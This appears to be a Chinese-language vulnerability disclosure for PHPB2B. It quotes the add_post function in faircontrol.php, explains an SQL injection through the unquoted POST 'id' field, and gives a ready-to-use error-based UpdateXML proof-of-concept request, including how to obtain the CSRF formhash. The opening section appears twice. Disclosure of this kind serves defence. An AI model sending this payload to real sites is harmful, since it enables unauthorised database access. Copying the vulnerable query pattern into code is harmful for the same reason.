### 简要描述: RT ### 详细说明: 在faircontrol.php中: ``` function add_post() { global $charset, $pb_user; if (empty($pb_user)) { die("<img src='".STATICURL."images/check_error.gif'/>".iconv($charset, "UTF-8//IGNORE", L("please_login_first"))); } $the_memberid = $pb_user['pb_userid']; $company_id = ''; if(isset($_POST['do']) && isset($_POST['id'])){ pb_submit_check('do'); if ($this->expo->checkExist($_POST['id']) && !$this->expo->dbstuff->GetOne("SELECT id FROM ".$fair->table_prefix."expos WHERE member_id='".$the_memberid."' AND expo_id='".$_POST['id']."'")) { $sql = "INSERT INTO {$this->expo->table_prefix}expomembers (expo_id,member_id,company_id,created,modified) VALUE (".$_POST['id'].",".$the_memberid.",".$company_id.",".$this->expo->timestamp.",".$this->expo->timestamp.")"; $result = $this->expo->dbstuff->Execute($sql); if (isset($_POST['is_ajax']) && $_POST['is_ajax']) { die("<img src='".STATICURL."images/check_right.gif'/>".iconv($charset, "UTF-8//IGNORE", L("action_successfully"))); }...
### 简要描述: RT ### 详细说明: 在faircontrol.php中: ``` function add_post() { global $charset, $pb_user; if (empty($pb_user)) { die("<img src='".STATICURL."images/check_error.gif'/>".iconv($charset, "UTF-8//IGNORE", L("please_login_first"))); } $the_memberid = $pb_user['pb_userid']; $company_id = ''; if(isset($_POST['do']) && isset($_POST['id'])){ pb_submit_check('do'); if ($this->expo->checkExist($_POST['id']) && !$this->expo->dbstuff->GetOne("SELECT id FROM ".$fair->table_prefix."expos WHERE member_id='".$the_memberid."' AND expo_id='".$_POST['id']."'")) { $sql = "INSERT INTO {$this->expo->table_prefix}expomembers (expo_id,member_id,company_id,created,modified) VALUE (".$_POST['id'].",".$the_memberid.",".$company_id.",".$this->expo->timestamp.",".$this->expo->timestamp.")"; $result = $this->expo->dbstuff->Execute($sql); if (isset($_POST['is_ajax']) && $_POST['is_ajax']) { die("<img src='".STATICURL."images/check_right.gif'/>".iconv($charset, "UTF-8//IGNORE", L("action_successfully"))); } echo "<script language='javascript'>window.close();</script>"; exit; }else { if (isset($_POST['is_ajax']) && $_POST['is_ajax']) { die("<img src='".STATICURL."images/check_error.gif'/>".iconv($charset, "UTF-8//IGNORE", L("action_failed"))); } flash("action_failed", '', 0); } } } ``` 在这段代码中,首先做了token验证(防止CSRF):pb_submit_check('do'); 接着根据post的ID值查询数据是否存在,如果不存在就进行插入操作: INSERT INTO {$this->expo->table_prefix}expomembers (expo_id,member_id,company_id,created,modified) VALUE (".$_POST['id'].",".$the_memberid.",".$company_id.",".$this->expo->timestamp.",".$this->expo->timestamp.")" 但是我们看到在插入的sql语句中 $_POST["id"]并没有两侧加上单引号,这样我们可以利用)# 形式进行闭合,形成sql注入。 POC: url:/phpb2b/index.php?do=fair&action=add_post post: id=1,(UpdateXML(1,CONCAT(0x5b,user(),0x5d),1)),3,1,1)%23&do=1&do=1&formhash=02d40d85c2dd1208&is_ajax=1 这里的formhash值需要从页面中获取,随便在页面上找一个表单 查看源代码即可看到。 为了测试方便,在本地先将debug模式打开(实际可以利用盲注,测试就用报错法了): [<img src="https://images.seebug.org/upload/201503/16204230f7c0e154bb73569cee7ffcd9bcaf25f2.jpg" alt="0718b3e8-61bf-4c3d-a685-d98770417b16.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/16204230f7c0e154bb73569cee7ffcd9bcaf25f2.jpg) ### 漏洞证明: POC: url:/phpb2b/index.php?do=fair&action=add_post post: id=1,(UpdateXML(1,CONCAT(0x5b,user(),0x5d),1)),3,1,1)%23&do=1&do=1&formhash=02d40d85c2dd1208&is_ajax=1 这里的formhash值需要从页面中获取,随便在页面上找一个表单 查看源代码即可看到。 为了测试方便,在本地先将debug模式打开(实际可以利用盲注,测试就用报错法了): [<img src="https://images.seebug.org/upload/201503/16204230f7c0e154bb73569cee7ffcd9bcaf25f2.jpg" alt="0718b3e8-61bf-4c3d-a685-d98770417b16.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/16204230f7c0e154bb73569cee7ffcd9bcaf25f2.jpg)
